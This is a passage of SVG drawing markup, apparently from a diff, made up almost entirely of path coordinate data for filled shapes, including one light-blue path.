459.19026,84.235622 457.95423,83.471712 C 457.50541,83.194327 456.85554,83.424717 456.51008,83.983688 C 456.16462,84.54266 454.07638,85 451.86955,85 C 448.07548,85 444.36914,87.035808 445.71429,88.380952 C 446.05476,88.721429 445.80833,89 445.16667,89 C 444.525,89 444,89.575658 444,90.279241 C 444,90.982823 443.07433,92.220323 441.94295,93.029241 C 440.81157,93.838158 439.06256,96.354428 438.05626,98.62095 C 435.21842,105.01274 431.99093,106.07787 425.5201,102.75814 z M 503.54168,67.270556 C 502.46461,66.996963 500.55211,66.097409 499.29168,65.271547 C 497.77373,64.276945 497,64.157313 497,64.917214 C 497,66.266442 500.64742,67.895657 503.5,67.820612 C 505.44805,67.769364 505.44913,67.755076 503.54168,67.270556 z M 301.25086,47.086941 C 301.66383,46.708179 299.41383,46.510426 296.25086,46.647492 C 293.08789,46.784557 286.45,46.951572 281.5,47.018636 C 275.28092,47.102894 273.11798,47.417967 274.5,48.038318 C 276.69589,49.023998 300.04421,48.19363 301.25086,47.086941 z M 276.58458,42.251242 C 276.30984,41.976503 277.07841,40.885322 278.29252,39.826395 L 280.5,37.901073 L 277.5,39.318658 C 275.85,40.09833 273.62571,40.597669 272.55714,40.4283 C 269.6779,39.971939 268.64275,41.018286 270.5754,42.431476 C 272.12826,43.566954 277.73221,43.398874 276.58458,42.251242 z M 282,33 C 282,32.45 281.2125,32.006891 280.25,32.015313 C 278.75445,32.028399 278.7181,32.171574 280,33 C 281.88721,34.21961 282,34.21961 282,33 z M 276,31.440983 C 276,31.198442 275.29844,31 274.44098,31 C 273.58352,31 273.16462,31.45734 273.51008,32.016312 C 274.08089,32.939894 276,32.496458 276,31.440983 z M 268.93548,29.465472 C 267.65139,28.778246 265.91838,28.477827 265.08435,28.797875 C 263.98238,29.220738 264.37858,29.711415 266.53396,30.593177 C 270.19804,32.09214 272.13976,31.180347 268.93548,29.465472 z M 369.48188,29.029317 C 370.32786,27.660493 365.60709,26.66023 362.82217,27.618218 C 360.66898,28.358896 360.75469,28.465042 364,29.076871 C 365.925,29.439787 367.81094,29.795956 368.19098,29.868359 C 368.57102,29.940761 369.15193,29.563193 369.48188,29.029317 z M 580.43026,103.67885 C 579.6296,101.59236 580.62996,100.22996 581.97503,101.57503 C 582.54305,102.14305 582.55778,103.0975 582.01215,103.98033 C 581.24492,105.22174 581.00475,105.17596 580.43026,103.67885 z M 346,102.46862 C 346,100.85123 347.56262,100.48329 348.43524,101.89522 C 348.73954,102.38758 348.3161,103.04846 347.49426,103.36383 C 346.5866,103.71213 346,103.3607 346,102.46862 z M 357.09549,99.059017 C 356.10095,98.444357 356.07329,98.072736 356.98037,97.512132 C 357.63701,97.106305 358.62426,97.224265 359.17426,97.774265 C 360.47748,99.077482 358.80143,100.11334 357.09549,99.059017 z M 304.44615,97.912868 C 303.58802,96.524389 305.49011,94.566834 306.86919,95.419157 C 308.01765,96.128941 307.28228,99 305.95203,99 C 305.49333,99 304.81569,98.51079 304.44615,97.912868 z M 291.73557,96.402234 C 290.26309,94.929754 292.45896,93 295.60699,93 C 299.63114,93 299.99613,94.225104 296.45295,95.839485 C 293.581,97.148032 292.59856,97.26523 291.73557,96.402234 z M 1251.2489,92.969282 C 1250.0108,92.471171 1248.3233,92.322454 1247.4989,92.638801 C 1246.6021,92.982914 1246,92.645411 1246,91.798669 C 1246,90.791114 1247.0804,90.446163 1249.75,90.601348 C 1253.3162,90.808649 1259.7916,92.803146 1257.3318,92.936614 C 1256.6893,92.971476 1255.5643,93.196862 1254.8318,93.43747 C 1254.0993,93.678079 1252.487,93.467394 1251.2489,92.969282 z M 310.96641,91.958076 C 309.843,91.247559 310.14323,90.991958 312.25,90.865313 C 313.7625,90.774391 315.525,90.655 316.16667,90.6 C 316.80833,90.545 317.48234,90.95 317.66446,91.5 C 318.09561,92.802055 312.86629,93.159686 310.96641,91.958076 z M 516.5,92.021184 C 515.4,91.536846 512.5875,91.108942 510.25,91.070285 C 507.9125,91.031628 506,90.55 506,90 C 506,89.45 506.47656,89 507.05902,89 C 507.64148,89 507.86454,88.589838 507.55471,88.088529 C 507.24489,87.587219 505.85739,87.30154 504.47138,87.453685 C 503.08537,87.60583 501.71074,87.340993 501.41666,86.865156 C 501.12258,86.38932 502.14602,85.940761 503.69098,85.868359 C 506.2205,85.749816 506.15175,85.673486 503,85.101232 L 499.5,84.465746 L 502.24559,82.620754 C 504.26035,81.266865 505.92398,80.950758 508.49559,81.433194 C 510.42301,81.794782 512,82.575335 512,83.167758 C 512,83.934248 512.37227,83.935934 513.29082,83.173603 C 514.00077,82.584396 517.39819,82.115788 520.84065,82.132252 C 524.2831,82.148717 527.65482,81.701437 528.33336,81.138296 C 529.01924,80.569066 530.15641,80.47863 530.89424,80.934635 C 531.62417,81.385761 533.14195,81.514134 534.26707,81.219909 C 535.71011,80.842544 536.08975,81.045772 535.55576,81.909785 C 535.07289,82.691081 535.55944,83.333537 536.89938,83.683939 C 538.05472,83.986067 539,84.839946 539,85.581448 C 539,87.414128 535.58174,89.110294 529,90.543528 C 525.975,91.202249 522.375,92.002336 521,92.3215 C 519.625,92.640663 517.6,92.505521 516.5,92.021184 z M 233,73 C 233,72.45 233.45,72 234,72 C 234.55,72 235,72.45 235,73 C 235,73.55 234.55,74 234,74 C 233.45,74 233,73.55 233,73 z M 755,73.239022 C 755,71.311475 757.97406,69.776675 760.48701,70.407385 C 763.11061,71.065866 763.90935,72.574667 761.75,72.79313 C 761.0625,72.862685 759.2625,73.215145 757.75,73.576374 C 756.15372,73.957613 755,73.816083 755,73.239022 z M 769.78754,64.704164 C 765.96465,62.627557 765.64455,61 769.05902,61 C 770.12656,61 770.8875,60.474289 770.75,59.831753 C 770.6125,59.189218 771.625,58.070852 773,57.346495 C 774.375,56.622139 775.05,56.012967 774.5,55.99278 C 773.95,55.972593 775.4125,55.08796 777.75,54.02693 C 780.0875,52.9659 782,51.588283 782,50.965559 C 782,50.342835 782.5625,50.026842 783.25,50.263353 C 783.9375,50.499863 786.975,49.838865 790,48.794467 C 793.025,47.75007 798.875,46.708097 803,46.478973 C 807.125,46.249849 813.9272,45.527061 818.11599,44.872778 C 826.65359,43.539219 830.30702,44.136928 827.92754,46.477968 C 826.6665,47.718633 818.75123,49.064398 805.1722,50.346859 C 802.79191,50.571664 800.33941,51.260586 799.7222,51.877798 C 799.10499,52.495009 797.86627,53 796.96948,53 C 794.77752,53 786.36949,57.318066 783.2067,60.068074 L 780.65746,62.284604 L 785.07873,64.593916 L 789.5,66.903229 L 781.5,66.812009 C 775.50009,66.743594 772.57184,66.21661 769.78754,64.704164 z M 1212.9991,65.785184 C 1213.0011,64.191058 1217.3452,62.911025 1221.784,63.196599 C 1228.785,63.647005 1227.4934,65.426428 1219.7491,66 C 1216.0361,66.275 1212.9986,66.178333 1212.9991,65.785184 z M 237,64.072003 C 237,63.398306 233.8694,62.241228 227.23548,60.46301 C 222.67672,59.241038 229.00884,55.310436 236.96301,54.424736 C 243.36991,53.711327 246.34058,54.589632 245.7076,57.010153 C 245.39578,58.202524 245.8816,58.997282 247.1203,59.321208 C 249.94091,60.058816 248.39225,62.752188 244.66646,63.588822 C 239.64089,64.717326 237,64.883769 237,64.072003 z M 232,58 C 230.04163,56.734403 228.71782,56.734403 229.5,58 C 229.83992,58.55 230.87898,58.993109 231.80902,58.984687 C 233.26629,58.971491 233.29269,58.835399 232,58 z M 1076.3559,56.75 C 1076.0953,56.3375 1076.6101,56 1077.5,56 C 1078.3899,56 1078.8691,55.597153 1078.5648,55.104785 C 1077.8399,53.931972 1081.1634,52.661232 1081.9201,53.821888 C 1082.239,54.311183 1084.1717,55.018854 1086.2149,55.39449 C 1092.9992,56.641761 1091.6423,58.118161 1084.0045,57.799417 C 1080.0585,57.634737 1076.6166,57.1625 1076.3559,56.75 z M 184.56791,52.818 C 182.77689,51.778677 181.66916,51.584389 175.09501,51.156524 C 172.75452,51.004198 172.73857,50.946362 174.5,49 C 175.49549,47.9 177.02773,46.964474 177.90499,46.921053 C 178.81882,46.875821 178.99807,46.637333 178.3247,46.362619 C 177.67829,46.098902 175.33371,46.809429 173.11454,47.941567 C 168.25419,50.421134 166.85754,50.534814 167.68302,48.383666 C 168.18648,47.071669 167.94521,46.947602 166.40163,47.724744 C 165.35573,48.251321 162.33903,48.580203 159.69785,48.455594 C 154.82507,48.2257 152.56979,47.351599 155.10687,46.676227 C 155.87309,46.472259 159.65,45.361082 163.5,44.206945 C 170.39253,42.140729 175.23807,41.665614 179.83825,42.604946 C 181.75866,42.997082 181.96015,43.343088 180.96581,44.541201 C 180.18716,45.479418 180.1346,46 180.81854,46 C 181.40342,46 182.16008,45.55 182.5,45 C 183.27484,43.746283 188,43.67469 188,44.916667 C 188,45.420833 187.6625,46.022081 187.25,46.252772 C 186.8375,46.483463 187.12956,46.509354 187.89902,46.310307 C 188.66847,46.11126 191.21479,46.680421 193.5575,47.575109 C 196.73471,48.788498 198.28486,48.92982 199.65848,48.131315 C 201.41079,47.112677 201.40311,47.058241 199.5,47.007639 C 197.97044,46.966968 198.25477,46.582299 200.70883,45.372266 C 203.74246,43.876461 204.06499,43.905961 206.61596,45.912553 C 208.26269,47.207874 210.05153,47.801032 211.20609,47.434589 C 212.2466,47.104344 214.17731,47.541386 215.49657,48.405794 C 216.81582,49.270201 218.58222,49.713811 219.4219,49.391594 C 220.76817,48.874985 220.75325,48.610397 219.29571,47.152873 C 217.75852,45.615701 217.76349,45.476757 219.36668,45.167957 C 220.31481,44.985333 222.30767,45.256081 223.79527,45.769619 C 225.50132,46.358566 228.73504,46.330587 232.55313,45.693842 C 235.88235,45.138627 239.77021,44.976495 241.19283,45.333548 C 244.2112,46.091111 245.52425,48.66339 243.89481,50.626748 C 242.42921,52.392687 233.1267,52.492927 232.45677,50.75 C 232.16791,49.998511 230.00733,49.471301 227.03917,49.428039 C 224.32374,49.38846 222.31142,49.694866 222.56733,50.10894 C 223.42427,51.495494 221.19438,52.0244 218.61932,51.045365 C 217.14369,50.484332 215.83871,50.45196 215.51949,50.968468 C 215.21626,51.459094 211.93783,51.876046 208.23409,51.895027 C 204.53034,51.914009 199.07608,52.395393 196.11351,52.964769 C 189.36013,54.262702 187.00594,54.232776 184.56791,52.818 z M 248.62367,52.166018 C 245.76779,51.616064 247.40625,49.524219 250.96538,49.176321 C 255.55356,48.727837 259,49.749932 259,51.559109 C 259,52.730533 258.00688,53.013449 254.679,52.790057 C 252.30246,52.630526 249.57755,52.349708 248.62367,52.166018 z M 1068.1566,51.591381 C 1065.9379,50.396801 1065.905,50.237882 1067.5379,48.60499 C 1069.049,47.093845 1070.7307,46.953142 1081.1208,47.468505 C 1087.6428,47.792006 1093.9796,48.426816 1095.2025,48.879193 C 1097.3872,49.687376 1097.3911,49.720325 1095.4267,50.771622 C 1092.2691,52.461556 1070.9624,53.10205 1068.1566,51.591381 z M 1102.2144,51.923125 C 1097.8091,50.583987 1098.9685,49.158859 1104.2438,49.428512 C 1106.5847,49.548168 1110.525,49.739387 1113,49.853443 C 1116.4697,50.013336 1117.1159,50.284927 1115.8223,51.039626 C 1113.2284,52.55301 1105.8602,53.031391 1102.2144,51.923125 z M 519,51.122445 C 519,49.195437 521.51824,48.335361 523.74407,49.50216 C 524.97831,50.149157 525.69081,50.975852 525.32741,51.339259 C 524.34445,52.322215 519,52.139082 519,51.122445 z M 1062,49 C 1062,47.706093 1063.7003,47.706093 1064.5,49 C 1064.8399,49.55 1064.4165,50 1063.559,50 C 1062.7016,50 1062,49.55 1062,49 z M 638.25,44.02693 C 635.9125,42.9659 634,41.68846 634,41.188175 C 634,40.68789 632.42839,40.403266 630.50753,40.555677 C 628.13705,40.743763 626.28982,40.190242 624.75753,38.832691 C 622.68723,36.99847 622.66587,36.881206 624.5,37.418751 C 626.40308,37.976502 626.41185,37.936425 624.68098,36.591746 C 622.93097,35.232186 622.93566,35.155195 624.80488,34.56193 C 625.87347,34.22277 629.84203,33.953254 633.62389,33.963006 C 637.40575,33.972758 642.3,33.767168 644.5,33.50614 C 648.65415,33.013254 663.71012,31.954706 667.90054,31.860906 C 672.17819,31.765154 680.9546,33.117529 681.47027,33.951894 C 682.26478,35.237439 674.9068,36.711647 668.63099,36.524308 C 665.4788,36.430212 662.69841,36.678959 662.45236,37.07708 C 662.20631,37.4752 664.30147,38.626736 667.10827,39.636048 L 672.21155,41.47116 L 669.35577,42.627055 C 667.56162,43.353249 665.01301,43.494297 662.5,43.006473 C 660.3,42.579412 658.95,42.163937 659.5,42.083196 C 660.05,42.002454 659.67594,41.31186 658.66875,40.548541 C 657.28407,39.499137 656.12572,39.408816 653.91875,40.178169 C 652.31344,40.737784 651,41.601629 651,42.097825 C 651,42.594021 650.14814,43 649.10699,43 C 648.06583,43 646.95496,43.675 646.63837,44.5 C 645.871,46.499731 643.38937,46.359777 638.25,44.02693 z M 188.2197,42.561559 C 180.69558,40.725066 180.64291,39.923171 188.081,40.44989 C 192.34493,40.751835 193.32493,40.653907 191,40.158205 C 187.58726,39.430571 187.6431,39.392602 193.23967,38.635317 C 196.39649,38.20816 199.923,38.158174 201.07637,38.524238 C 203.14106,39.179545 203.14378,39.217393 201.253,40.978921 C 198.51172,43.532816 194.29618,44.04471 188.2197,42.561559 z M 214.88029,42.355754 C 213.6589,40.884079 213.77725,40.790921 216.00784,41.468149 C 219.51883,42.534115 220.85894,44 218.32244,44 C 217.17979,44 215.63082,43.260089 214.88029,42.355754 z M 245.77055,42.006027 C 242.64392,41.064333 239.58952,38.371722 240.79959,37.623859 C 242.21924,36.746468 253.39002,38.670059 253.78674,39.860225 C 253.9957,40.487101 255.28072,41 256.64235,41 C 258.03816,41 258.84845,41.436191 258.5,42 C 257.77132,43.179036 249.67793,43.182868 245.77055,42.006027 z M 228,41 C 229.85794,40.404983 228.89485,40.17376 224.25,40.09968 C 220.8125,40.044856 218,39.55 218,39 C 218,38.45 217.325,38 216.5,38 C 215.675,38 215,37.607514 215,37.127808 C 215,35.720433 222.8705,34.860326 225.05428,36.029051 C 226.14716,36.613942 227.45895,36.834387 227.96937,36.51893 C 229.33139,35.677154 238.07091,38.076252 237.42856,39.115588 C 237.12793,39.602014 237.35852,40 237.94098,40 C 238.52344,40 239,40.45 239,41 C 239,41.577746 236.14979,41.95791 232.25,41.90032 C 227.34947,41.827952 226.18499,41.581268 228,41 z M 935,41.052279 C 935,40.6197 936.87796,39.022998 939.17324,37.504052 C 943.10549,34.901814 943.61078,34.810947 947.92324,35.930516 C 950.44046,36.584017 953.25114,37.122698 954.1692,37.127585 C 955.08725,37.132473 956.08563,37.780765 956.38781,38.568236 C 956.81139,39.672063 955.85646,40.041889 952.21862,40.182888 C 949.62338,40.283477 946.21529,40.275361 944.64508,40.164854 C 943.07488,40.054346 940.26238,40.385773 938.39508,40.901358 C 936.52779,41.416943 935,41.484857 935,41.052279 z M 929.94893,38.615595 C 929.67381,38.340477 927.21025,38.019455 924.47436,37.902212 C 921.73846,37.784969 918.75704,37.317015 917.84899,36.862314 C 916.94093,36.407613 914.09636,35.860511 911.52773,35.646531 C 905.6536,35.157188 903.51545,33.396966 907.60536,32.417468 C 909.19741,32.036184 910.95,31.386661 911.5,30.974084 C 913.58603,29.409263 922.78701,28.865842 927.11408,30.051898 C 930.79509,31.060867 931.17856,31.383089 929.5,32.056756 C 927.5,32.859429 927.5,32.859429 929.5,33.036014 C 930.6,33.133135 932.175,33.312791 933,33.435249 C 933.825,33.557707 935.19107,33.734872 936.03571,33.82895 C 936.88036,33.923027 937.57143,34.9 937.57143,36 C 937.57143,37.125855 936.90021,38.005968 936.03571,38.013655 C 935.19107,38.021165 933.58856,38.272222 932.47457,38.571559 C 931.36059,38.870897 930.22405,38.890713 929.94893,38.615595 z M 234.5,34 C 234.14044,33.418215 235.13661,33 236.88197,33 C 238.53197,33 240.16008,33.45 240.5,34 C 240.85956,34.581785 239.86339,35 238.11803,35 C 236.46803,35 234.83992,34.55 234.5,34 z M 747,32.502028 L 742.5,31.160954 L 746.5,30.918114 C 764.43194,29.829468 772.62584,30.404677 764.5,32.181706 C 757.28242,33.760108 751.57223,33.864628 747,32.502028 z M 770,33 C 768.89475,32.28573 769.55266,32.030626 772.5,32.030626 C 775.44734,32.030626 776.10525,32.28573 775,33 C 774.175,33.533156 773.05,33.969374 772.5,33.969374 C 771.95,33.969374 770.825,33.533156 770,33 z M 781.63837,32.5 C 782.06132,31.397823 781.50691,31 779.54797,31 C 775.57845,31 777.34414,29.351308 781.9795,28.729575 C 787.12262,28.039738 790.02254,28.7777 789.32381,30.598536 C 788.58756,32.517195 793.85976,32.420645 796.44113,30.468197 C 798.56963,28.858283 802.57598,28.504902 803.40949,29.853551 C 803.69996,30.323536 806.4821,30.307994 809.60059,29.818967 C 812.71556,29.330492 815.50473,29.171394 815.79875,29.465415 C 816.94629,30.612961 814.6469,31.473717 809.68617,31.753601 C 806.83378,31.914533 801.125,32.457988 797,32.961279 C 785.16147,34.405697 780.95555,34.279401 781.63837,32.5 z " + id="path2175" /> + <path + style="fill:#71B7F1" + d="M 3.5,589.98392 C 1.0320741,589.36464 1.2460551,589.29486 4.7064918,589.59047 C 7.0200624,589.78811 9.1550353,589.55816 9.4508761,589.07948 C 9.8706167,588.40033 21.557372,586.75379 27.5,586.53656 C 28.05,586.51645 28.886087,585.89064 29.357971,585.14586 C 30.008374,584.11932 32.790563,583.84998 40.857971,584.03255 C 54.332772,584.33748 54.983923,584.28211 53,583 C 51.87625,582.27378 52.377916,582.03348 55,582.042 C 61.670544,582.06367 90.514119,578.86505 93.5,577.77252 C 95.15,577.16879 98.75,576.55931 101.5,576.41812 C 125.10454,575.20624 142.07015,573.31075 144.88532,571.57088 C 145.56247,571.15237 149.80279,571.28724 154.30825,571.87058 C 158.81371,572.45392 170.5568,573.17409 180.40399,573.47095 C 190.25119,573.76782 198.84927,574.45994 199.51083,575.00899 C 200.81266,576.08941 207,575.24093 207,573.98199 C 207,573.1683 204.5309,572 202.81122,572 C 202.24736,572 202.04504,572.675 202.36163,573.5 C 202.67821,574.325 202.50135,575 201.96862,575 C 200.46242,575 200.82931,572.00273 202.40974,571.39626 C 203.1851,571.09873 205.18775,571.56285 206.86008,572.42765 C 208.53241,573.29244 211.22159,574 212.83603,574 C 214.45048,574 217.06032,574.67223 218.63569,575.49384 C 220.21106,576.31545 223.48135,576.99045 225.90301,576.99384 C 230.29015,576.99998 230.29833,576.99333 228.1712,575.14848 C 226.99705,574.13014 226.32819,573.00514 226.68485,572.64848 C 227.04152,572.29182 226.38489,572 225.22568,572 C 224.06648,572 222.89179,571.63392 222.61526,571.1865 C 222.02461,570.23081 231.65009,571.31675 232.6522,572.31886 C 233.02682,572.69349 232.24583,573.01431 230.91667,573.0318 C 228.68677,573.06115 228.6361,573.1669 230.26109,574.40015 C 231.83246,575.59272 231.85709,575.87372 230.48967,577.00857 C 229.42414,577.89289 227.15848,578.09244 223.05417,577.66345 C 218.82507,577.22142 217.02678,577.39433 216.71249,578.27323 C 216.47122,578.94795 215.92308,579.17337 215.4944,578.77417 C 215.06573,578.37496 215.28422,577.36246 215.97994,576.52417 C 217.07846,575.20053 216.70251,575 213.12244,575 C 210.8551,575 209,575.45 209,576 C 209,577.30277 200.70233,577.30233 199.39949,575.99949 C 198.84796,575.44796 190.11986,574.75044 179.94949,574.44513 C 169.80227,574.14051 158.24301,573.43578 154.26224,572.87906 C 150.28147,572.32234 146.60378,572.12685 146.08958,572.44464 C 143.10371,574.29001 115.4117,577.28759 102.52461,577.16042 C 99.788152,577.13342 97.26657,577.56868 96.921098,578.12767 C 96.336175,579.07409 91.717906,579.72365 70,581.91414 C 65.325,582.38566 59.475,583.35635 57,584.07124 C 54.195799,584.8812 48.398623,585.26605 41.616517,585.09247 C 33.383241,584.88175 30.532229,585.13884 29.908395,586.14822 C 29.454843,586.88208 28.502411,587.50183 27.791878,587.52545 C 21.692603,587.72815 9.8781719,589.38811 9.4353672,590.10458 C 8.8191799,591.10159 7.8778089,591.08245 3.5,589.98392 z M 1216.3916,589.0028 C 1211.9319,588.61242 1207.8677,588.03627 1207.36,587.72247 C 1205.5756,586.61969 1173.157,585.93693 1172.5071,586.98844 C 1171.5659,588.51135 1163.891,588.19158 1160.6357,586.49384 C 1159.0603,585.67223 1157.0927,585 1156.2632,585 C 1155.0361,585 1154.987,584.72056 1156,583.5 C 1156.9411,582.3661 1156.9535,582 1156.051,582 C 1155.2619,582 1155.3657,581.49145 1156.3571,580.5 C 1157.1821,579.675 1158.2608,579 1158.7543,579 C 1159.2477,579 1160.6863,577.89834 1161.9513,576.55187 C 1163.2162,575.2054 1165.6572,573.80344 1167.3756,573.4364 C 1169.094,573.06936 1171.0584,572.31934 1171.7408,571.76968 C 1172.4233,571.22003 1174.3358,570.96906 1175.9908,571.21196 C 1177.6459,571.45487 1179,571.28155 1179,570.82681 C 1179,570.37206 1179.675,570 1180.5,570 C 1181.325,570 1182,569.325 1182,568.5 C 1182,567.675 1182.45,567 1183,567 C 1184.7716,567 1184.0032,569.45264 1181.7186,571.09008 C 1180.4984,571.96462 1177.8964,572.73526 1175.9365,572.80262 C 1171.9021,572.94126 1166.6531,575.29878 1167.7651,576.47269 C 1168.1693,576.89936 1167.6,576.97783 1166.5,576.64706 C 1165.4,576.31629 1163.825,576.47849 1163,577.00752 C 1161.7192,577.82879 1161.7558,577.97161 1163.25,577.98469 C 1164.2125,577.99311 1165,578.45 1165,579 C 1165,579.55 1163.6766,580 1162.059,580 C 1156.304,580 1157.1026,584.35126 1163.1925,586.17582 C 1166.3104,587.10997 1167.6061,587.10261 1169.1443,586.14198 C 1171.5073,584.66627 1203.102,585.45761 1209.5,587.15276 C 1211.7,587.73565 1224.075,588.5428 1237,588.94641 L 1260.5,589.68025 L 1242.5,589.69642 C 1232.6,589.70531 1220.8512,589.39319 1216.3916,589.0028 z M 406.5,585.59691 C 396.05,583.77877 385.025,581.58111 382,580.71322 C 378.975,579.84534 374.5875,578.84027 372.25,578.47973 C 369.9125,578.11919 368,577.41376 368,576.9121 C 368,575.75545 369.5318,575.74626 371.76357,576.8895 C 374.94774,578.52063 395.30295,582.85034 412.2743,585.50644 C 426.29719,587.7011 429.90574,587.95705 434.2743,587.06687 C 437.77648,586.35323 442.90564,586.30423 449.82588,586.91829 C 458.13757,587.65582 460.82458,587.55342 463.60106,586.39333 C 465.49819,585.60066 469.17654,584.72714 471.77519,584.45217 C 478.96421,583.69148 491.45911,580.85911 491.82278,579.90773 C 492.00031,579.4433 493.80031,578.76707 495.82278,578.405 C 497.84525,578.04292 500.24729,577.09532 501.16066,576.29921 C 502.07402,575.5031 505.25292,574.52176 508.22488,574.11846 C 511.71442,573.64492 514.88379,572.42768 517.17245,570.68204 C 519.62468,568.81163 521.76131,568.03605 524.10822,568.16442 C 528.2281,568.38976 539.32898,566.22981 543.65113,564.36186 C 545.38425,563.61284 547.72019,563 548.84211,563 C 549.96403,563 551.11275,562.62658 551.39482,562.17018 C 551.67689,561.71379 556.54095,561.26422 562.20384,561.17114 C 573.06302,560.99266 582.66987,559.06214 582.25,557.14282 C 581.85285,555.32733 586.1465,555.81826 587.56035,557.75 C 588.70919,559.31966 590.98766,559.5 609.67059,559.5 C 624.27249,559.5 631.24744,559.12812 633,558.25616 C 635.86237,556.83203 641,556.57847 641,557.86133 C 641,558.33506 642.0125,558.55601 643.25,558.35233 C 644.4875,558.14865 651.575,558.56677 659,559.28147 C 669.96624,560.33705 673.89561,560.34235 679.9359,559.3097 C 684.02564,558.61052 687.58423,558.2509 687.84389,558.51055 C 688.10354,558.77021 688.80739,558.57682 689.40799,558.08081 C 691.23718,556.57017 698,555.63186 698,556.88871 C 698,557.49992 698.9,558 700,558 C 701.1,558 702,557.37748 702,556.61663 C 702,555.11235 706.09253,553.61816 706.96422,554.80418 C 707.61281,555.68665 716.2752,558 718.93102,558 C 719.97729,558 720.99612,558.48835 721.19508,559.08523 C 721.39403,559.6821 722.66903,559.0654 724.02841,557.71477 C 725.83529,555.91952 728.786,554.80737 735,553.57948 C 739.675,552.6557 745.00065,551.42948 746.83478,550.85456 C 748.66891,550.27963 751.81891,550.09385 753.83478,550.44171 C 756.12918,550.83765 757.00113,550.73836 756.16615,550.17626 C 755.0869,549.44971 755.13461,549.16232 756.41615,548.67055 C 757.28727,548.33627 758.69662,548.33009 759.54804,548.65681 C 760.44615,549.00145 761.67128,548.46346 762.46609,547.37543 C 763.63533,545.77483 765.13038,545.5114 772.66805,545.57782 C 781.42908,545.65502 787.01882,546.56892 788.0213,548.088 C 788.30801,548.52247 789.88301,549.13421 791.5213,549.44743 C 796.36985,550.37439 827.9665,551.95008 829.54669,551.34371 C 830.44176,551.00024 831,551.39598 831,552.37396 C 831,553.29655 832.15225,554.20912 833.75,554.55193 C 835.2625,554.87645 838.525,555.75312 841,556.50009 C 845.8731,557.97082 857.60053,557.20628 858.83365,555.33747 C 859.72098,553.99271 865.65044,552.00792 868.89922,551.9682 C 870.32965,551.9507 872.37351,551.2757 873.44113,550.4682 C 875.362,549.01533 875.36201,548.9852 873.4427,547.58176 C 870.58568,545.49265 872.32069,544.6207 876.55439,546.01795 C 879.44158,546.97081 881.86237,546.97396 887.69858,546.03248 C 894.00346,545.0154 895.4126,545.0534 896.82719,546.27868 C 898.08243,547.36594 900.8714,547.66831 908,547.49001 C 918.16081,547.23586 921,546.57237 921,544.45203 C 921,542.04231 923.01115,541.80315 928.047,543.61401 C 932.20355,545.10869 933.55087,545.20258 936.34487,544.19226 C 938.17944,543.52887 941.04778,543.25956 942.71895,543.59379 C 944.50435,543.95087 946.03893,543.74602 946.44001,543.09707 C 947.21023,541.85083 951.4013,542.62206 954.5,544.58026 C 955.6,545.2754 958.64303,546.15614 961.2623,546.53746 C 963.88156,546.91878 966.26013,547.61188 966.54801,548.07768 C 967.02284,548.84598 968.05224,548.56844 974.5,545.93373 C 978.39204,544.34334 983.09389,543.83303 984.33844,544.86592 C 986.3769,546.55769 996.96204,548.22226 1004.5,548.03643 C 1011.4993,547.86388 1014.2699,546.90287 1011.9326,545.45836 C 1011.1322,544.9637 1010.9446,545.10128 1011.4045,545.84549 C 1011.7969,546.48047 1011.6415,547 1011.059,547 C 1010.4766,547 1010,546.57656 1010,546.05902 C 1010,544.61793 1012.1413,543.61765 1012.8618,544.72218 C 1013.2128,545.26031 1014.5697,546.26442 1015.8772,546.95354 C 1017.7511,547.94125 1018.4149,547.94674 1019.0127,546.97946 C 1020.0082,545.36873 1033.2036,546.11072 1033.7698,547.80926 C 1034.3569,549.57067 1042,549.36085 1042,547.58333 C 1042,546.80417 1041.4586,545.98621 1040.7969,545.76565 C 1040.1353,545.54509 1043.7353,545.56263 1048.7969,545.80464 C 1056.9557,546.19471 1058,546.05223 1058,544.549 C 1058,543.45497 1058.6209,542.98914 1059.75,543.23607 C 1060.7125,543.44656 1061.3963,544.12829 1061.2695,544.75103 C 1061.1391,545.39128 1062.8772,546.11105 1065.2695,546.40744 C 1075.6662,547.69557 1084.1547,548.33761 1092.5,548.46705 C 1100.3687,548.58911 1101.4631,548.81993 1101.2062,550.30333 C 1100.9755,551.63499 1101.6747,552 1104.4562,552 C 1106.4053,552 1108,552.34501 1108,552.76669 C 1108,553.18837 1112.6027,553.67751 1118.2282,553.85365 C 1123.8538,554.0298 1129.1413,554.52917 1129.9782,554.96335 C 1130.8152,555.39753 1134.65,556.07421 1138.5,556.46708 C 1142.35,556.85995 1146.85,557.81228 1148.5,558.58337 C 1150.15,559.35446 1152.85,560.06892 1154.5,560.17107 C 1156.15,560.27322 1157.8662,560.54581 1158.3138,560.77684 C 1158.7614,561.00786 1162.1364,561.33695 1165.8138,561.50813 C 1169.4912,561.67932 1174.9218,562.52495 1177.8817,563.38732 C 1180.8416,564.24969 1183.6031,564.74528 1184.0184,564.48864 C 1184.4336,564.232 1185.3869,564.7701 1186.1367,565.68443 C 1187.3599,567.17594 1187.243,567.27053 1185,566.60454 C 1176.4563,564.06777 1165.04,561.92344 1162.3393,562.34818 C 1160.6009,562.62158 1158.8881,562.55478 1158.5331,562.19973 C 1158.178,561.84467 1156.3687,561.45701 1154.5124,561.33826 C 1152.6561,561.2195 1149.8689,560.47636 1148.3186,559.68683 C 1146.7684,558.8973 1142.35,557.92345 1138.5,557.52271 C 1134.65,557.12197 1130.7709,556.40582 1129.8797,555.93127 C 1128.9885,555.45671 1123.0485,554.97366 1116.6797,554.85782 C 1110.3109,554.74197 1105.3086,554.30972 1105.5635,553.89724 C 1105.8184,553.48477 1103.551,552.83793 1100.5248,552.45983 C 1097.4986,552.08174 1095.2691,551.3736 1095.5703,550.88619 C 1095.8716,550.39879 1094.854,549.94197 1093.309,549.87105 C 1091.7641,549.80013 1089.375,549.63596 1088,549.50624 C 1086.625,549.37651 1080.775,548.92095 1075,548.49388 C 1063.8192,547.66706 1059.4952,546.62579 1060.4988,545.00187 C 1060.8394,544.45084 1060.6415,544 1060.059,544 C 1059.4766,544 1059,544.675 1059,545.5 C 1059,546.70833 1057.4444,547 1051,547 C 1044.5556,547 1043,547.29167 1043,548.5 C 1043,550.50981 1035.2268,550.48613 1032.5589,548.4682 C 1030.365,546.80885 1020.5059,546.39144 1021.5,548 C 1021.8596,548.58179 1020.8634,549 1019.118,549 C 1017.468,549 1015.8392,548.54878 1015.4983,547.9973 C 1015.1056,547.3619 1014.2434,547.33457 1013.1445,547.92269 C 1008.9863,550.14805 987.80077,548.7394 984.52367,546.01965 C 983.03068,544.78057 975.9233,545.63909 974.919,547.17982 C 974.59944,547.67005 973.05598,548.30363 971.48907,548.58776 C 969.92216,548.87189 968.30221,549.31323 967.88917,549.5685 C 967.47614,549.82377 966.88764,549.62721 966.58139,549.1317 C 